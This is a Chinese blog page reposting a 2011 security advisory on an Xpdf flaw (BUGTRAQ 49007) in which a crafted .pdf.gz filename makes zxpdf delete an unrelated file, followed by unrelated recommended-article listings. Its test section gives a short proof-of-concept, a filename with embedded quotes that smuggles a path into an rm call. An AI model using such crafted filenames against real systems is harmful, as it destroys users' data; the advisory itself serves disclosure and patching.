Linux更改pdf安全性,Xpdf “zxpdf”安全限制绕过漏洞

最新推荐文章于 2023-10-03 15:28:00 发布
最新推荐文章于 2023-10-03 15:28:00 发布
阅读量200 收藏
点赞数
文章标签: Linux更改pdf安全性

发布日期:2011-08-04

更新日期:2011-08-04

受影响系统:

Xpdf Xpdf 3.02-13

不受影响系统:

Xpdf Xpdf 3.02-19

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 49007

Xpdf是便携文档格式(PDF)文件的开放源码查看器。

Xpdf在zxpdf的实现上存在安全限制绕过漏洞,远程攻击者可利用此漏洞绕过安全限制,执行未授权操作。

通过特制的.pdf.gz文件名称(通过Web浏览器发送到浏览器),只要文件名是单字符,xpdf可误删除不相关的文档。

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$ touch y # The unrelated victim file

$ gzip -c </dev/null >'" y ".pdf.gz' # Create a .pdf.gz file

$ xpdf '" y ".pdf.gz' # View it using xpdf

Error: May not be a PDF file (continuing anyway)

Error: PDF file is damaged - attempting to reconstruct xref table...

Error: Couldn't find trailer dictionary

Error: Couldn't read xref table

rm: cannot remove `/tmp/': Is a directory

$ ls -l y # The victim file is gone!

ls: cannot access y: No such file or directory

建议:

--------------------------------------------------------------------------------

厂商补丁:

Xpdf

----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

0b1331709591d260c1c78e86d0c51c18.png

活着回来
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PDF-HTML.rar_html PDF_pdf html_pdfhtml_xpdf
09-21
7. **批处理功能**:对于处理大量PDF文件的情况,工具通常会提供批量转换功能,可以一次性处理多个文件,提高效率。 在使用这个“PDF-HTML”工具时,用户需要了解如何运行它,输入PDF文件路径,以及指定输出HTML...
linux纯文本图片查看器,linux – 如何生成在文档查看器中工作的纯文本源代码PDF示例?...
weixin_36196497的博客
05-14 217
我刚发现帖子Adobe Forums: Simple Text String Example in specification broken.,所以我有兴趣找到纯文本源代码PDF示例.所以,通过这篇文章,我最终发现:PDF 1.7规范见第699页附录“_Annex H(资料性)PDF文件示例”;从那里,我想尝试“H.3简单文本字符串示例”(“经典Hello World”).所以我试着把它保存为he...
[论文工具] LaTeX常见错误及解决方法汇总笔记(eps2pdf失败 | 特殊符号 | 参考文献未显示或越界)
最新发布
杨秀璋的专栏
10-03 9702
回过头来,我们在编程过程中,经常会遇到各种各样的问题。然而,很多问题都无法解决,网上夹杂着各种冗余的回答,甚至需要看自己多年前的博客来解决。为更好地从事科学研究和编程学习,后续将撰写各类常见错误及解决方法的汇总笔记。本文主要介绍LaTeX常见错误,希望对您有所帮助。
关于git、github关联使用的入门教程
splendid_java的专栏
12-29 368
转自同学(ID:gyb_fighting): 文章地址: http://blog.csdn.net/zamamiro/article/details/70172900 ID:gyb_fighting
导入LibXMPP编译出错-解决办法
才华横溢庄稼汉
11-10 584
导入即时通信 LibXMPP第三方库 出错,具体解决方案见博客
PHP 文档在线预览方案
u013756836的专栏
05-28 897
总体思路: OpenOffice + SWFTools + FLexPager OpenOffice 通过调用jodconverter-cli-2.2.2.jar,转换Office文档为PDF SWFTools 执行pdf2swf命令,转换PDF文档为SWF格式 使用FLexPager播放转换后的SWF文件 结合php需要处理两方面内容分别为文档转换、Flash插件的预览。在服务器Linux软件环境的安装与调试工作比较坑,经过几天Google终于完成,写篇文章以做总结。 软件安装 SWFTools
pdf转svg的实用程序(Linux
07-06
PDF转SVG工具在Linux环境下的应用 在计算机领域,PDF(Portable Document Format)是一种广泛用于文档交换的格式,而SVG(Scalable Vector Graphics)则是用于网页和图形设计的矢量图形格式。这两种格式各有其优势...
PHP读取PDF内容配合Xpdf的使用
10-27
在PHP中,有时候我们需要从PDF文档中提取文本内容,例如...这种方法虽然有效,但可能不适合所有场景,尤其是对性能和安全性有高要求的项目,可能需要考虑其他更高级的库或服务,如PDFBox、PDF.js或专门的PDF解析库。
pdf编辑文件xpdf
10-27
不过,为了解决这个问题,有一个名为xpdf的工具,它专为Linux设计,能够帮助用户在Linux系统中顺利阅读PDF文件。 xpdf是一款轻量级的PDF阅读器,它包含了一系列的实用程序,如pdftops(将PDF转换为PostScript)、...
xpdf linux已配置好的安装包,解压即可用,还包含多数字体
01-07
xpdf是一款开源的PDF文档查看和转换工具,主要用于Linux操作系统。这款软件因其轻量级、高效和用户友好而广受欢迎。在Linux环境中,xpdf提供了一种方便的方式来阅读、打印和处理PDF文件,而且它不依赖Adobe Acrobat ...
mqtt-cn 3.1.1.pdf.gz
11-03
MQTT 3.1.1 中文版本上传,亲自看过,全部都是正确的,大家可以好好学下
PDF格式分析(十三)如何处理PDF文件破损问题
steve_cui的博客
08-29 7116
PDF文件破损,通常是一些非法操作造成的。PDF文件中有部分内容缺失,如xref,重要的object对象。 1、xref破损 确实解决这个问题,并不复杂,只需要从文件头开始读取对象,记录下对象号和对象起始偏移位置,重新建立xref(交叉引用表),将无效的简介引用置空值,就可以了,如果同一个间接对象出现多次,取最晚出现的那个为准。如果PDF文件是加密的,要先将加密对象进行解析,然后计算出密钥,用...
qt实现的pdf阅读器(二)--XpdfReader在linux下的编译
qq_36939187的博客
12-23 1805
Xpdf 是一个免费的 PDF 查看器和工具包,包括文本提取器、图像转换器、 HTML 转换器等。大多数工具都是开源的。
PDF转换解析工具—XPDF
热门推荐
splendid_java的专栏
09-01 1万+
String[] cmd = getCmd(new File(targetfile), isLayout); Runtime.getRuntime().exec(cmd); 最近一直在研究PDF的解析,发现有很多的软件或SDK可以预处理。这里预处理的意思仅仅是转换一种存储格式,还需要我们进一步的结构化处理。现在介绍几种预处理方案: 第一、使用OCR软件识别。 这个做的最
在Myeclipse中使用java2word出现异常解决办法
splendid_java的专栏
12-16 3434
<br />       昨天,在使用java2word生成报表时,出现了如下异常:"类库不能被初始化,请检查是否安装到本机器。如果从其它机器拷贝到本机器时,会出现此异常。"<br /> <br />       我已经安装了java2word,在eclipse中使用没错,但在action中调用相同的代码时,却报错。最后终于找到了原因,以下为解决方法:<br />在myeclipse中部的web程序运行时报如下异常的:<br /><br />java.lang.Exception: 初始化类库出错,请检查是
解决Windows下xpdf转换中文pdf时报错字库缺失问题 - 图文教程
zhichaosong的博客
08-12 4285
Xpdf是用来处理和转换 PDF 的利器。项目中需要将 PDF 转换为图片,但是发现有的 PDF 文档转换缺失字体,而且下载 ttf格式的字体也不起作用,于是到官方文档才发现还需要配置字库,而且官方给出的是 pfb格式的字库,根据说明配置好后问题迎刃而解。 官网下载地址:http://www.xpdfreader.com/download.html 一、报错提示 以 pdftoppm 为例...
java.lang.UnsatisfiedLinkError ... couldn't find "xxx.so" 的原因以及解决方案
geekqian的博客
09-05 5696
项目引用一个第三方so库时出现这问题, 百度谷歌搜了一大堆没什么鬼用, 于是跑去问技术支持. 一语点醒. 首先日志报的找不到64位的so库, 先确保已经在项目中的相应文件夹配置了. 之后的问题就极大可能是在build.grade文件配置中出了差错. 于是我打开该文件里看了下… 果然问题出在这里, 于是加上 “arm64-v8a” 后问题得到解决. ...
linux 安装 xpdf csdn,Fedora xpdf大概的执行步骤
weixin_30556403的博客
05-25 403
Fedora xpdf还是比较常用的,于是我研究了一下Fedora xpdf,在这里拿出来和大家分享一下,希望对大家有用。新装的Fedora,自带的Fedora xpdf工具——evince不能正常浏览中文pdf(chinapub的,其他的我不知道支持不支持),在网上找了下对策,需要安装Fedora xpdf的中文字体包。于是打算通过Fedora yum来查找安装,由于我用的是系统默认的源,结果找...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值